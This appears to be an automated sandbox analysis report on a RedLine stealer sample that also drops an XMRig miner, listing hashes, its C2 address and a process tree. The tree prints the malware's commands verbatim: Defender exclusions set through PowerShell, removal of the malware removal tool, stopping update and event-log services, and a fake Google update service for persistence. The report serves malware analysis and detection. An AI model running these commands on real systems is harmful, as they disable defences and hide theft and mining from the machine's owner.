Analysis
-
max time kernel
292s -
max time network
294s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09-05-2024 23:31
Static task
static1
Behavioral task
behavioral1
Sample
cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe
Resource
win10-20240404-en
General
-
Target
cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe
-
Size
462KB
-
MD5
b1910535419200a891f5c2a827d7b4e0
-
SHA1
7c6b9a90802e3b5897c2fc6a70ebdb6de93548c6
-
SHA256
cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba
-
SHA512
0ec4ff629358bdf79ee029ffc21b0093fa07f09c8a43f5d45dc0aeb4a960f87c3fc731b155a6032f2d2b7a1890fa7632f30fcede40e9d79a8f35e33442dca1b5
-
SSDEEP
12288:S3/SNRR4lpxJLeURhAYmVYujbsqboi3VfygKU:S63Glp7Lj3Bujbsq1+
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.77:6541
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3748-0-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
fie.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fie.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 16 IoCs
Processes:
resource yara_rule behavioral2/memory/652-272-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-274-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-275-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-273-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-271-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-268-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-267-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-276-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-277-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-279-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-280-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-281-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-278-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-283-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-282-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/652-284-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 1320 powershell.exe 4232 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
fie.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts fie.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
fie.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fie.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fie.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Executes dropped EXE 2 IoCs
Processes:
fie.exeupdater.exepid process 2384 fie.exe 4832 updater.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\fie.exe themida behavioral2/memory/2384-40-0x00007FF711FF0000-0x00007FF712DB7000-memory.dmp themida behavioral2/memory/2384-42-0x00007FF711FF0000-0x00007FF712DB7000-memory.dmp themida behavioral2/memory/2384-43-0x00007FF711FF0000-0x00007FF712DB7000-memory.dmp themida behavioral2/memory/2384-44-0x00007FF711FF0000-0x00007FF712DB7000-memory.dmp themida behavioral2/memory/2384-45-0x00007FF711FF0000-0x00007FF712DB7000-memory.dmp themida behavioral2/memory/2384-94-0x00007FF711FF0000-0x00007FF712DB7000-memory.dmp themida behavioral2/memory/4832-97-0x00007FF747D00000-0x00007FF748AC7000-memory.dmp themida behavioral2/memory/4832-98-0x00007FF747D00000-0x00007FF748AC7000-memory.dmp themida behavioral2/memory/4832-99-0x00007FF747D00000-0x00007FF748AC7000-memory.dmp themida behavioral2/memory/4832-100-0x00007FF747D00000-0x00007FF748AC7000-memory.dmp themida behavioral2/memory/4832-269-0x00007FF747D00000-0x00007FF748AC7000-memory.dmp themida -
Processes:
resource yara_rule behavioral2/memory/652-264-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-272-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-274-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-275-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-273-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-271-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-268-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-267-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-266-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-263-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-262-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-261-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-276-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-277-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-279-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-280-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-281-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-278-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-283-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-282-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/652-284-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
fie.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fie.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 4 IoCs
Processes:
fie.exepowershell.exeupdater.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe fie.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
fie.exeupdater.exepid process 2384 fie.exe 4832 updater.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exeupdater.exedescription pid process target process PID 4780 set thread context of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4832 set thread context of 3892 4832 updater.exe conhost.exe PID 4832 set thread context of 652 4832 updater.exe explorer.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2084 sc.exe 1708 sc.exe 4556 sc.exe 2152 sc.exe 340 sc.exe 3408 sc.exe 4300 sc.exe 5088 sc.exe 1068 sc.exe 912 sc.exe 1832 sc.exe 5092 sc.exe 2132 sc.exe 5032 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 47 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Processes:
RegAsm.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
RegAsm.exefie.exepowershell.exeupdater.exepowershell.exeexplorer.exepid process 3748 RegAsm.exe 3748 RegAsm.exe 3748 RegAsm.exe 2384 fie.exe 1320 powershell.exe 1320 powershell.exe 1320 powershell.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 2384 fie.exe 4832 updater.exe 4232 powershell.exe 4232 powershell.exe 4232 powershell.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 4832 updater.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe 652 explorer.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
Processes:
RegAsm.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exeexplorer.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3748 RegAsm.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeIncreaseQuotaPrivilege 1320 powershell.exe Token: SeSecurityPrivilege 1320 powershell.exe Token: SeTakeOwnershipPrivilege 1320 powershell.exe Token: SeLoadDriverPrivilege 1320 powershell.exe Token: SeSystemProfilePrivilege 1320 powershell.exe Token: SeSystemtimePrivilege 1320 powershell.exe Token: SeProfSingleProcessPrivilege 1320 powershell.exe Token: SeIncBasePriorityPrivilege 1320 powershell.exe Token: SeCreatePagefilePrivilege 1320 powershell.exe Token: SeBackupPrivilege 1320 powershell.exe Token: SeRestorePrivilege 1320 powershell.exe Token: SeShutdownPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeSystemEnvironmentPrivilege 1320 powershell.exe Token: SeRemoteShutdownPrivilege 1320 powershell.exe Token: SeUndockPrivilege 1320 powershell.exe Token: SeManageVolumePrivilege 1320 powershell.exe Token: 33 1320 powershell.exe Token: 34 1320 powershell.exe Token: 35 1320 powershell.exe Token: 36 1320 powershell.exe Token: SeShutdownPrivilege 4516 powercfg.exe Token: SeCreatePagefilePrivilege 4516 powercfg.exe Token: SeShutdownPrivilege 4876 powercfg.exe Token: SeCreatePagefilePrivilege 4876 powercfg.exe Token: SeShutdownPrivilege 4324 powercfg.exe Token: SeCreatePagefilePrivilege 4324 powercfg.exe Token: SeShutdownPrivilege 4248 powercfg.exe Token: SeCreatePagefilePrivilege 4248 powercfg.exe Token: SeDebugPrivilege 4232 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4232 powershell.exe Token: SeIncreaseQuotaPrivilege 4232 powershell.exe Token: SeSecurityPrivilege 4232 powershell.exe Token: SeTakeOwnershipPrivilege 4232 powershell.exe Token: SeLoadDriverPrivilege 4232 powershell.exe Token: SeSystemtimePrivilege 4232 powershell.exe Token: SeBackupPrivilege 4232 powershell.exe Token: SeRestorePrivilege 4232 powershell.exe Token: SeShutdownPrivilege 4232 powershell.exe Token: SeSystemEnvironmentPrivilege 4232 powershell.exe Token: SeUndockPrivilege 4232 powershell.exe Token: SeManageVolumePrivilege 4232 powershell.exe Token: SeShutdownPrivilege 2172 powercfg.exe Token: SeCreatePagefilePrivilege 2172 powercfg.exe Token: SeLockMemoryPrivilege 652 explorer.exe Token: SeShutdownPrivilege 5068 powercfg.exe Token: SeCreatePagefilePrivilege 5068 powercfg.exe Token: SeShutdownPrivilege 592 powercfg.exe Token: SeCreatePagefilePrivilege 592 powercfg.exe Token: SeShutdownPrivilege 1072 powercfg.exe Token: SeCreatePagefilePrivilege 1072 powercfg.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exeRegAsm.execmd.execmd.exeupdater.exedescription pid process target process PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 4780 wrote to memory of 3748 4780 cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe RegAsm.exe PID 3748 wrote to memory of 2384 3748 RegAsm.exe fie.exe PID 3748 wrote to memory of 2384 3748 RegAsm.exe fie.exe PID 4772 wrote to memory of 592 4772 cmd.exe powercfg.exe PID 4772 wrote to memory of 592 4772 cmd.exe powercfg.exe PID 3572 wrote to memory of 3600 3572 cmd.exe wusa.exe PID 3572 wrote to memory of 3600 3572 cmd.exe wusa.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 3892 4832 updater.exe conhost.exe PID 4832 wrote to memory of 652 4832 updater.exe explorer.exe PID 4832 wrote to memory of 652 4832 updater.exe explorer.exe PID 4832 wrote to memory of 652 4832 updater.exe explorer.exe PID 4832 wrote to memory of 652 4832 updater.exe explorer.exe PID 4832 wrote to memory of 652 4832 updater.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe"C:\Users\Admin\AppData\Local\Temp\cb7f2dbecd68994f85137528ce2fc68f43f491c99ea7c231247b76e8b0e7b0ba.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Users\Admin\AppData\Local\Temp\fie.exe"C:\Users\Admin\AppData\Local\Temp\fie.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2384 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:592
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:912 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1068 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:5032 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:1832 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:5088 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4876 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:340 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:4300 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2084 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:3408
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3600
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2132 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2152 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5092 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4556 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1708 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072 -
